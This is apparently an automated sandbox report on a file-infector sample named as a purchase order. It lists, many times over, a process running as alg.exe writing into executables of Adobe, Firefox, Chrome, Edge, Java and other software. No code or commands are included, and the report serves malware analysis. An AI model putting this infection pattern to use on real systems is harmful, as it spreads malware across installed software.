Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
